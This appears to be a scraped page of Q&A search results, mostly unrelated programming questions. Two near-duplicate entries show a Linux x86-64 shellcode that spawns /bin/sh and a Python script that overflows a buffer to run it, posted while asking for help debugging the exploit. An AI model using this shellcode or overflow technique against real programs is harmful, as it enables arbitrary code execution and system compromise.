Search Results

Search found 20360 results on 815 pages for 'capture output'.

Page 128/815 | < Previous Page | 124 125 126 127 128 129 130 131 132 133 134 135  | Next Page >

  • String search and write into file in jython

    - by kdev
    hi Everyone , i wish to write a program that can read a file and if a particular str_to_find is found in a bigger string say AACATGCCACCTGAATTGGATGGAATTCATGCGGGACACGCGGATTACACCTATGAGCAGAAATACGGCCTGCGCGATTACCGTGGCGGTGGACGTTCTTCCGCGCGTGAAACCGCGATGCGCGTAGCGGCAGGGGCGATCGCCAAGAAATACCTGGCGGAAAAGTTCGGCATCGAAATCCGCGGCTGCCTGACCCAGATGGGCGACATTCCGCTGGAGATTAAAGACTGGCGTCAGGTTGAGCTTAATCCGTTTTC then write that line and the above line of it into the file and keep repeating it for all the match found. Please suggest i have written the program for printing that particular search line but i dont know how to write the above line. Thanks everyone for your help. import re import string file=open('C:/Users/Administrator/Desktop/input.txt','r') output=open('C:/Users/Administrator/Desktop/output.txt','w') count_record=file.readline() str_to_find='AACCATGC' while count_record: if string.find(list,str_to_find) ==0: output.write(count_record) file.close() output.close()

    Read the article

  • PHP throws 'Allowed memory exhausted' errors while migrating data in Drupal.

    - by Stan
    I'm trying to setup a tiny sandbox on a local machine to play around with Drupal. I created a few CCK types; in order to create a few nodes I wrote the following script: chdir('C:\..\drupal'); require_once '.\includes\bootstrap.inc'; drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL); module_load_include('inc', 'node', 'node.pages'); $node = array('type' => 'my_type'); $link = mysql_connect(..); mysql_select_db('my_db'); $query_bldg = ' SELECT stuff FROM table LIMIT 10 '; $result = mysql_query($query_bldg); while ($row = mysql_fetch_object($result)) { $form_state = array(); $form_state['values']['name'] = 'admin'; $form_state['values']['status'] = 1; $form_state['values']['op'] = t('Save'); $form_state['values']['title'] = $row->val_a; $form_state['values']['my_field'][0]['value'] = $row->val_b; ## About another dozen or so of similar assignments... drupal_execute('node_form', $form_state, (object)$node); } Here are a few relevant lines from php_errors.log: [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:47] PHP Warning: session_start(): Cannot send session cookie - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 1143 [12-Jun-2010 05:02:47] PHP Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 1143 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 709 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 710 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 711 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 712 [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:48] PHP Fatal error: Allowed memory size of 239075328 bytes exhau sted (tried to allocate 261904 bytes) in C:\..\drupal\includes\form.inc on line 488 [12-Jun-2010 05:03:22] PHP Fatal error: Allowed memory size of 239075328 bytes exhausted (tried to allocate 261904 bytes) in C:\..\drupal\includes\form.inc on line 488 [12-Jun-2010 05:04:34] PHP Fatal error: Allowed memory size of 262144 bytes exhausted (tried to allocate 261904 bytes) in Unknown on line 0 At this point any action php takes results in the last error shown above. I tried increasing the value of memory_limit in php.ini before the final Fatal error which obviously didn't help. How can the error be eliminated? Am I on a correct path to migrating data into Drupal or should the cck tables be operated on directly? Windows XP PHP 5.3.2 VC6 Apache 2.2

    Read the article

  • Custom Content Pipeline with Automatic Serialization Load Error

    - by Direweasel
    I'm running into this error: Error loading "desert". Cannot find type TiledLib.MapContent, TiledLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null. at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.InstantiateTypeReader(String readerTypeName, ContentReader contentReader, ContentTypeReader& reader) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.GetTypeReader(String readerTypeName, ContentReader contentReader, List1& newTypeReaders) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.ReadTypeManifest(Int32 typeCount, ContentReader contentReader) at Microsoft.Xna.Framework.Content.ContentReader.ReadHeader() at Microsoft.Xna.Framework.Content.ContentReader.ReadAsset[T]() at Microsoft.Xna.Framework.Content.ContentManager.ReadAsset[T](String assetName, Action1 recordDisposableObject) at Microsoft.Xna.Framework.Content.ContentManager.Load[T](String assetName) at TiledTest.Game1.LoadContent() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 51 at Microsoft.Xna.Framework.Game.Initialize() at TiledTest.Game1.Initialize() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 39 at Microsoft.Xna.Framework.Game.RunGame(Boolean useBlockingRun) at Microsoft.Xna.Framework.Game.Run() at TiledTest.Program.Main(String[] args) in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Program.cs:line 15 When trying to run the game. This is a basic demo to try and utilize a separate project library called TiledLib. I have four projects overall: TiledLib (C# Class Library) TiledTest (Windows Game) TiledTestContent (Content) TMX CP Ext (Content Pipeline Extension Library) TiledLib contains MapContent which is throwing the error, however I believe this may just be a generic error with a deeper root problem. EMX CP Ext contains one file: MapProcessor.cs using System; using System.Collections.Generic; using System.Linq; using Microsoft.Xna.Framework; using Microsoft.Xna.Framework.Graphics; using Microsoft.Xna.Framework.Content.Pipeline; using Microsoft.Xna.Framework.Content.Pipeline.Graphics; using Microsoft.Xna.Framework.Content.Pipeline.Processors; using Microsoft.Xna.Framework.Content; using TiledLib; namespace TMX_CP_Ext { // Each tile has a texture, source rect, and sprite effects. [ContentSerializerRuntimeType("TiledTest.Tile, TiledTest")] public class DemoMapTileContent { public ExternalReference<Texture2DContent> Texture; public Rectangle SourceRectangle; public SpriteEffects SpriteEffects; } // For each layer, we store the size of the layer and the tiles. [ContentSerializerRuntimeType("TiledTest.Layer, TiledTest")] public class DemoMapLayerContent { public int Width; public int Height; public DemoMapTileContent[] Tiles; } // For the map itself, we just store the size, tile size, and a list of layers. [ContentSerializerRuntimeType("TiledTest.Map, TiledTest")] public class DemoMapContent { public int TileWidth; public int TileHeight; public List<DemoMapLayerContent> Layers = new List<DemoMapLayerContent>(); } [ContentProcessor(DisplayName = "TMX Processor - TiledLib")] public class MapProcessor : ContentProcessor<MapContent, DemoMapContent> { public override DemoMapContent Process(MapContent input, ContentProcessorContext context) { // build the textures TiledHelpers.BuildTileSetTextures(input, context); // generate source rectangles TiledHelpers.GenerateTileSourceRectangles(input); // now build our output, first by just copying over some data DemoMapContent output = new DemoMapContent { TileWidth = input.TileWidth, TileHeight = input.TileHeight }; // iterate all the layers of the input foreach (LayerContent layer in input.Layers) { // we only care about tile layers in our demo TileLayerContent tlc = layer as TileLayerContent; if (tlc != null) { // create the new layer DemoMapLayerContent outLayer = new DemoMapLayerContent { Width = tlc.Width, Height = tlc.Height, }; // we need to build up our tile list now outLayer.Tiles = new DemoMapTileContent[tlc.Data.Length]; for (int i = 0; i < tlc.Data.Length; i++) { // get the ID of the tile uint tileID = tlc.Data[i]; // use that to get the actual index as well as the SpriteEffects int tileIndex; SpriteEffects spriteEffects; TiledHelpers.DecodeTileID(tileID, out tileIndex, out spriteEffects); // figure out which tile set has this tile index in it and grab // the texture reference and source rectangle. ExternalReference<Texture2DContent> textureContent = null; Rectangle sourceRect = new Rectangle(); // iterate all the tile sets foreach (var tileSet in input.TileSets) { // if our tile index is in this set if (tileIndex - tileSet.FirstId < tileSet.Tiles.Count) { // store the texture content and source rectangle textureContent = tileSet.Texture; sourceRect = tileSet.Tiles[(int)(tileIndex - tileSet.FirstId)].Source; // and break out of the foreach loop break; } } // now insert the tile into our output outLayer.Tiles[i] = new DemoMapTileContent { Texture = textureContent, SourceRectangle = sourceRect, SpriteEffects = spriteEffects }; } // add the layer to our output output.Layers.Add(outLayer); } } // return the output object. because we have ContentSerializerRuntimeType attributes on our // objects, we don't need a ContentTypeWriter and can just use the automatic serialization. return output; } } } TiledLib contains a large amount of files including MapContent.cs using System; using System.Collections.Generic; using System.Globalization; using System.Xml; using Microsoft.Xna.Framework.Content.Pipeline; namespace TiledLib { public enum Orientation : byte { Orthogonal, Isometric, } public class MapContent { public string Filename; public string Directory; public string Version = string.Empty; public Orientation Orientation; public int Width; public int Height; public int TileWidth; public int TileHeight; public PropertyCollection Properties = new PropertyCollection(); public List<TileSetContent> TileSets = new List<TileSetContent>(); public List<LayerContent> Layers = new List<LayerContent>(); public MapContent(XmlDocument document, ContentImporterContext context) { XmlNode mapNode = document["map"]; Version = mapNode.Attributes["version"].Value; Orientation = (Orientation)Enum.Parse(typeof(Orientation), mapNode.Attributes["orientation"].Value, true); Width = int.Parse(mapNode.Attributes["width"].Value, CultureInfo.InvariantCulture); Height = int.Parse(mapNode.Attributes["height"].Value, CultureInfo.InvariantCulture); TileWidth = int.Parse(mapNode.Attributes["tilewidth"].Value, CultureInfo.InvariantCulture); TileHeight = int.Parse(mapNode.Attributes["tileheight"].Value, CultureInfo.InvariantCulture); XmlNode propertiesNode = document.SelectSingleNode("map/properties"); if (propertiesNode != null) { Properties = new PropertyCollection(propertiesNode, context); } foreach (XmlNode tileSet in document.SelectNodes("map/tileset")) { if (tileSet.Attributes["source"] != null) { TileSets.Add(new ExternalTileSetContent(tileSet, context)); } else { TileSets.Add(new TileSetContent(tileSet, context)); } } foreach (XmlNode layerNode in document.SelectNodes("map/layer|map/objectgroup")) { LayerContent layerContent; if (layerNode.Name == "layer") { layerContent = new TileLayerContent(layerNode, context); } else if (layerNode.Name == "objectgroup") { layerContent = new MapObjectLayerContent(layerNode, context); } else { throw new Exception("Unknown layer name: " + layerNode.Name); } // Layer names need to be unique for our lookup system, but Tiled // doesn't require unique names. string layerName = layerContent.Name; int duplicateCount = 2; // if a layer already has the same name... if (Layers.Find(l => l.Name == layerName) != null) { // figure out a layer name that does work do { layerName = string.Format("{0}{1}", layerContent.Name, duplicateCount); duplicateCount++; } while (Layers.Find(l => l.Name == layerName) != null); // log a warning for the user to see context.Logger.LogWarning(string.Empty, new ContentIdentity(), "Renaming layer \"{1}\" to \"{2}\" to make a unique name.", layerContent.Type, layerContent.Name, layerName); // save that name layerContent.Name = layerName; } Layers.Add(layerContent); } } } } I'm lost as to why this is failing. Thoughts? -- EDIT -- After playing with it a bit, I would think it has something to do with referencing the projects. I'm already referencing the TiledLib within my main windows project (TiledTest). However, this doesn't seem to make a difference. I can place the dll generated from the TiledLib project into the debug folder of TiledTest, and this causes it to generate a different error: Error loading "desert". Cannot find ContentTypeReader for Microsoft.Xna.Framework.Content.Pipeline.ExternalReference`1[Microsoft.Xna.Framework.Content.Pipeline.Graphics.Texture2DContent]. at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.GetTypeReader(Type targetType, ContentReader contentReader) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.GetTypeReader(Type targetType) at Microsoft.Xna.Framework.Content.ReflectiveReaderMemberHelper..ctor(ContentTypeReaderManager manager, FieldInfo fieldInfo, PropertyInfo propertyInfo, Type memberType, Boolean canWrite) at Microsoft.Xna.Framework.Content.ReflectiveReaderMemberHelper.TryCreate(ContentTypeReaderManager manager, Type declaringType, FieldInfo fieldInfo) at Microsoft.Xna.Framework.Content.ReflectiveReader1.Initialize(ContentTypeReaderManager manager) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.ReadTypeManifest(Int32 typeCount, ContentReader contentReader) at Microsoft.Xna.Framework.Content.ContentReader.ReadHeader() at Microsoft.Xna.Framework.Content.ContentReader.ReadAsset[T]() at Microsoft.Xna.Framework.Content.ContentManager.ReadAsset[T](String assetName, Action1 recordDisposableObject) at Microsoft.Xna.Framework.Content.ContentManager.Load[T](String assetName) at TiledTest.Game1.LoadContent() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 51 at Microsoft.Xna.Framework.Game.Initialize() at TiledTest.Game1.Initialize() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 39 at Microsoft.Xna.Framework.Game.RunGame(Boolean useBlockingRun) at Microsoft.Xna.Framework.Game.Run() at TiledTest.Program.Main(String[] args) in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Program.cs:line 15 This is all incredibly frustrating as the demo doesn't appear to have any special linking properties. The TiledLib I am utilizing is from Nick Gravelyn, and can be found here: https://bitbucket.org/nickgravelyn/tiledlib. The demo it comes with works fine, and yet in recreating I always run into this error.

    Read the article

  • _CopyWebApplication with web.config transformations

    - by Jeremy
    I am trying to have my web application automatically Publish when a Release build is performed. I'm doing this using the _CopyWebApplication target. I added the following to my .csproj file: <!-- Automatically Publish in Release build. --> <Import Project="$(MSBuildExtensionsPath)\Microsoft\VisualStudio\v10.0\WebApplications\Microsoft.WebApplication.targets" /> <Target Name="AfterBuild"> <RemoveDir Directories="$(ProjectDir)..\Output\MyWeb" ContinueOnError="true" /> <MSBuild Projects="MyWeb.csproj" Properties="Configuration=Release;WebProjectOutputDir=$(ProjectDir)..\Output\MyWeb;OutDir=$(ProjectDir)bin\" Targets="ResolveReferences;_CopyWebApplication" /> </Target> This works but with one issue. The difference between this output, and the output generated when using the Publish menu item in Visual Studio, is that the Web.Release.config transformation is not applied to the Web.config file when using the MSBuild method. Instead, Web.config, Web.Release.config, and Web.Debug.config are all copied. Any ideas are appreciated.

    Read the article

  • Java, server client TCP communication ends with RST

    - by Senne
    I'm trying to figure out if this is normal. Because without errors, a connection should be terminated by: FIN -> <- ACK <- FIN ACK -> I get this at the end of a TCP connection (over SSL, but i also get it with non-encrypted): From To 1494 server client TCP search-agent > 59185 [PSH, ACK] Seq=25974 Ack=49460 Win=63784 Len=50 1495 client server TCP 59185 > search-agent [ACK] Seq=49460 Ack=26024 Win=63565 Len=0 1496 client server TCP 59185 > search-agent [PSH, ACK] Seq=49460 Ack=26024 Win=63565 Len=23 1497 client server TCP 59185 > search-agent [FIN, ACK] Seq=49483 Ack=26024 Win=63565 Len=0 1498 server client TCP search-agent > 59185 [PSH, ACK] Seq=26024 Ack=49484 Win=63784 Len=23 1499 client server TCP 59185 > search-agent [RST, ACK] Seq=49484 Ack=26047 Win=0 Len=0 The client exits normally and reaches socket.close, shouldn't then the connection be shut down normally, without a reset? I can't find anything about the TCP streams of java on google... Here is my code: Server: package Security; import java.io.*; import java.net.*; import javax.net.ServerSocketFactory; import javax.net.ssl.*; import java.util.*; public class SSLDemoServer { private static ServerSocket serverSocket; private static final int PORT = 1234; public static void main(String[] args) throws IOException { int received = 0; String returned; ObjectInputStream input = null; PrintWriter output = null; Socket client; System.setProperty("javax.net.ssl.keyStore", "key.keystore"); System.setProperty("javax.net.ssl.keyStorePassword", "vwpolo"); System.setProperty("javax.net.ssl.trustStore", "key.keystore"); System.setProperty("javax.net.ssl.trustStorePassword", "vwpolo"); try { System.out.println("Trying to set up server ..."); ServerSocketFactory factory = SSLServerSocketFactory.getDefault(); serverSocket = factory.createServerSocket(PORT); System.out.println("Server started!\n"); } catch (IOException ioEx) { System.out.println("Unable to set up port!"); ioEx.printStackTrace(); System.exit(1); } while(true) { client = serverSocket.accept(); System.out.println("Client trying to connect..."); try { System.out.println("Trying to create inputstream..."); input = new ObjectInputStream(client.getInputStream()); System.out.println("Trying to create outputstream..."); output = new PrintWriter(client.getOutputStream(), true); System.out.println("Client successfully connected!"); while( true ) { received = input.readInt(); returned = Integer.toHexString(received); System.out.print(" " + received); output.println(returned.toUpperCase()); } } catch(SSLException sslEx) { System.out.println("Connection failed! (non-SSL connection?)\n"); client.close(); continue; } catch(EOFException eofEx) { System.out.println("\nEnd of client data.\n"); } catch(IOException ioEx) { System.out.println("I/O problem! (correct inputstream?)"); } try { input.close(); output.close(); } catch (Exception e) { } client.close(); System.out.println("Client closed.\n"); } } } Client: package Security; import java.io.*; import java.net.*; import javax.net.ssl.*; import java.util.*; public class SSLDemoClient { private static InetAddress host; private static final int PORT = 1234; public static void main(String[] args) { System.setProperty("javax.net.ssl.keyStore", "key.keystore"); System.setProperty("javax.net.ssl.keyStorePassword", "vwpolo"); System.setProperty("javax.net.ssl.trustStore", "key.keystore"); System.setProperty("javax.net.ssl.trustStorePassword", "vwpolo"); System.out.println("\nCreating SSL socket ..."); SSLSocket socket = null; try { host = InetAddress.getByName("192.168.56.101"); SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault(); socket = (SSLSocket) factory.createSocket(host, PORT); socket.startHandshake(); } catch(UnknownHostException uhEx) { System.out.println("\nHost ID not found!\n"); System.exit(1); } catch(SSLException sslEx) { System.out.println("\nHandshaking unsuccessful ..."); System.exit(1); } catch (IOException e) { e.printStackTrace(); } System.out.println("\nHandshaking succeeded ...\n"); SSLClientThread client = new SSLClientThread(socket); SSLReceiverThread receiver = new SSLReceiverThread(socket); client.start(); receiver.start(); try { client.join(); receiver.join(); System.out.println("Trying to close..."); socket.close(); } catch(InterruptedException iEx) { iEx.printStackTrace(); } catch(IOException ioEx) { ioEx.printStackTrace(); } System.out.println("\nClient finished."); } } class SSLClientThread extends Thread { private SSLSocket socket; public SSLClientThread(SSLSocket s) { socket = s; } public void run() { try { ObjectOutputStream output = new ObjectOutputStream(socket.getOutputStream()); for( int i = 1; i < 1025; i++) { output.writeInt(i); sleep(10); output.flush(); } output.flush(); sleep(1000); output.close(); } catch(IOException ioEx) { System.out.println("Socket closed or unable to open socket."); } catch(InterruptedException iEx) { iEx.printStackTrace(); } } } class SSLReceiverThread extends Thread { private SSLSocket socket; public SSLReceiverThread(SSLSocket s) { socket = s; } public void run() { String response = null; BufferedReader input = null; try { input = new BufferedReader( new InputStreamReader(socket.getInputStream())); try { response = input.readLine(); while(!response.equals(null)) { System.out.print(response + " "); response = input.readLine(); } } catch(Exception e) { System.out.println("\nEnd of server data.\n"); } input.close(); } catch(IOException ioEx) { ioEx.printStackTrace(); } } }

    Read the article

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328 Debugging with gdb: $ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb) $ gdb buffer (gdb) run < exploit.txt Starting program: /home/henning/bo/buffer < exploit.txt Stackpointer 0x7fffffffe308 Jump to 0x7fffffffe308 process 4185 is executing new program: /bin/dash Program exited normally.

    Read the article

  • Convert text files to excel files using python

    - by Rahim Jaafar
    I am working on INFORMIX 4GL programs. That programs produce output text files.This is an example of the output: Lot No|Purchaser name|Billing|Payment|Deposit|Balance| J1006|JAUHARI BIN HAMIDI|5285.05|4923.25|0.00|361.80| J1007|LEE, CHIA-JUI AKA LEE, ANDREW J. R.|5366.15|5313.70|0.00|52.45| J1008|NAZRIN ANEEZA BINTI NAZARUDDIN|5669.55|5365.30|0.00|304.25| J1009|YAZID LUTFI BIN AHMAD LUTFI|3180.05|3022.30|0.00|157.75| This text files can manually convert to excel files.But, I wanna ask, is there any script that I can use to convert .txt files to .xls files ? Hi all,now I'm already can convert text files to excell file by python using script that was given from user named Rami Helmy.A big thanks for him.But now,That script will produce more than one excell files depends on the number of '|' from the text files.Beside that,That script also can only convert one text files.I a going to convert all text files without state the name of text files.Therefore,I am looking such a way on how to this script going to: output only one excell file convert all .txt files from the directory that was given from user. output excell's file name are automaticly copied from the file name of text files. I am new in python,hopefully someone can help me to solve my problems.Thank You.. done all the task,but there was something that I'm confused.. that output excell files contains an "square" symbol like this: then, how can I ensure that there is no square symbol like that after I convert from text files to excell? thank you...

    Read the article

  • WCF Method is returning xml fragment but no xml UTF-8 header

    - by horls
    My method does not return the header, just the root element xml. internal Message CreateReturnMessage(string output, string contentType) { // create dictionaryReader for the Message byte[] resultBytes = Encoding.UTF8.GetBytes(output); XmlDictionaryReader xdr = XmlDictionaryReader.CreateTextReader(resultBytes, 0, resultBytes.Length, Encoding.UTF8, XmlDictionaryReaderQuotas.Max, null); if (WebOperationContext.Current != null) WebOperationContext.Current.OutgoingResponse.ContentType = contentType; // create Message return Message.CreateMessage(MessageVersion.None, "", xdr); } However, the output I get is: <Test> <Message>Hello World!</Message> </Test> I would like the output to render as: <?xml version="1.0" encoding="utf-8" standalone="yes"?> <Test> <Message>Hello World!</Message> </Test>

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • Dependency Property not getting updated value via ActivityBind

    - by d h
    I have a Sequence Activity which holds two activities (Activity A and B), the input dependency property for Activity B is bound an output dependency property of Activity A. However, when I run the sequence activity, the Input for activity B is never updated and just uses the default value of activity A's output. My question is: is there a way to enforce an update on activity B's input so that it gets the latest value of activity A's output?

    Read the article

  • Can't display multi byte string on MonoDevelop Mac OS X

    - by wataradio
    The problem is following one line code: Console.WriteLine ("?"); This results in the following output in Application Output window: ? How can I display "?" instead of "?" in Application Output window. I made sure following things: The source code encoding is UTF-8 I selected Japanese font set "Osaka Regular-Mono" (Preferences General Font) Executing the exe from a terminal, "?" is displayed correctly on terminal window On Ubuntu's MonoDevelop, "?" is displayed correctly in Application Output window Environments: MonoDevelop 2.2.2 Mono 2.6.4 Mac OS X 10.6.3

    Read the article

  • Overload Anonymous Functions

    - by Nissan Fan
    Still wrapping my head around Delegates and I'm curious: Is it possible to overload anonymous functions? Such that: delegate void Output(string x, int y); Supports: Output show = (x, y) => Console.WriteLine("{0}: {1}", x.ToString(), y.ToString()); And: delegate void Output(string x, string y); Allowing: show( "ABC", "EFG" ); And: show( "ABC", 123 );

    Read the article

  • audio processing in iPhone

    - by Janaka
    I am writing an iPhone application to apply filters to audio input and output the result in real time. I am new to audio processing but using audiounit, the correct approach? I found out how to output data using audiounit but couldn’t figure out how to capture input audio. Is there a sample application showing how to connect input and output using audiounit?

    Read the article

  • i want to find values between { }

    - by girish
    I m working with regular expression( Regex ) but not finding the exact output.. i want to find the values between two curly braces { Value } = value i use the following pattern but not getting the exact output...it does not remove first "{" ... string pattern = "\{*\}"; if my value is - {girish} it returns me {girish instead of this i want girish as output...

    Read the article

  • SimpleDOM sortedXPath date sorting works on localhost but not on remote server.

    - by Imminent
    Here's what i'm trying to do: 1) Take a basic XML page (data.xml) 2) Load it with simpleDOM 3) Use simpleDOM sortedXPath to sort all XML items by their pubDate 4) Display sorted output Here is the code I currently have. My code below outputs exactly what I need when run it on my localhost (XAMPP w/PHP 5.3) but on my remote server (which has at least PHP 5.0+) all is lost and a completely blank page is output. It will output the $xml array with print_r though. Here is my code: <?php include('SimpleDOM.php'); $xml = simpledom_load_file('data.xml'); $dateformat = "D j M, g:ia"; /* print_r($xml); <-array will output on remote server if put here, but alas nothing else beyond this point */ /*Output First 5 items sorted by pubDate*/ foreach($xml->channel->sortedXPath('item','pubDate', SORT_DESC) as $i => $item){ if ($i > 4){ break; } print "<p>This Weeks Deal:<strong> ".$item->title."</strong></p>"; print $item->description; print "<p>Date Posted:<strong> ".date($dateformat, strtotime($item->pubDate))."</strong></p>"; } ?> Like I said, this code seems to work great on my localhost... but not being able to run it on my remote server is making me crazy. Any ideas ?? Any help will be far beyond appreciated.

    Read the article

  • How do I give each test its own TestResults folder?

    - by izb
    I have a set of unit tests, each with a bunch of methods, each of which produces output in the TestResults folder. At the moment, all the test files are jumbled up in this folder, but I'd like to bring some order to the chaos. Ideally, I'd like to have a folder for each test method. I know I can go round adding code to each test to make it produce output in a subfolder instead, but I was wondering if there was a way to control the output folder location with the Visual Studio unit test framework, perhaps using an initialization method on each test class so that any new tests added automatically get their own output folder without needing copy/pasted boilerplate code?

    Read the article

  • Mercurial 1.5 pager on Windows

    - by alexandrul
    I'm trying to set the pager used for Mercurial but the output is empty, even if I specify the command in the [pager] section or as the PAGER environment variable. I noticed that the command provided is launched with cmd.exe. Is this the cause of empty output, and if yes, what is the right syntax? Environment: Mercurial 1.5, Mecurial 1.4.3 hgrc: [extensions] pager = [pager] pager = d:\tools\less\less.exe Sample command lines (from Process Explorer): hg diff c:\windows\system32\cmd.exe /c "d:\tools\less\less.exe 2> NUL:" d:\tools\less\less.exe UPDATE In pager.py, by replacing: sys.stderr = sys.stdout = util.popen(p, "wb") with sys.stderr = sys.stdout = subprocess.Popen(p, stdin = subprocess.PIPE, shell=False).stdin I managed to obtain the desired output for the hg status and diff. BUT, I'm sure it's wrong (or at least incomplete), and I have no control over the pager app (less.exe): the output is shown in the cmd.exe window, I can see the less prompt (:) but any further input is fed into cmd.exe. It seems that the pager app is still active in the background: after typing exit in the cmd.exe window, I have control over the pager app, and I can terminate it normally. Also, it makes no difference what I'm choosing as a pager app (more is behaving the same). UPDATE 2 Issue1677 - [PATCH] pager for "hg help" output on windows

    Read the article

  • Help to solve "Robbery Problem"

    - by peiska
    Hello, Can anybody help me with this problem in C or Java? The problem is taken from here: http://acm.pku.edu.cn/JudgeOnline/problem?id=1104 Inspector Robstop is very angry. Last night, a bank has been robbed and the robber has not been caught. And this happened already for the third time this year, even though he did everything in his power to stop the robber: as quickly as possible, all roads leading out of the city were blocked, making it impossible for the robber to escape. Then, the inspector asked all the people in the city to watch out for the robber, but the only messages he got were of the form "We don't see him." But this time, he has had enough! Inspector Robstop decides to analyze how the robber could have escaped. To do that, he asks you to write a program which takes all the information the inspector could get about the robber in order to find out where the robber has been at which time. Coincidentally, the city in which the bank was robbed has a rectangular shape. The roads leaving the city are blocked for a certain period of time t, and during that time, several observations of the form "The robber isn't in the rectangle Ri at time ti" are reported. Assuming that the robber can move at most one unit per time step, your program must try to find the exact position of the robber at each time step. Input The input contains the description of several robberies. The first line of each description consists of three numbers W, H, t (1 <= W,H,t <= 100) where W is the width, H the height of the city and t is the time during which the city is locked. The next contains a single integer n (0 <= n <= 100), the number of messages the inspector received. The next n lines (one for each of the messages) consist of five integers ti, Li, Ti, Ri, Bi each. 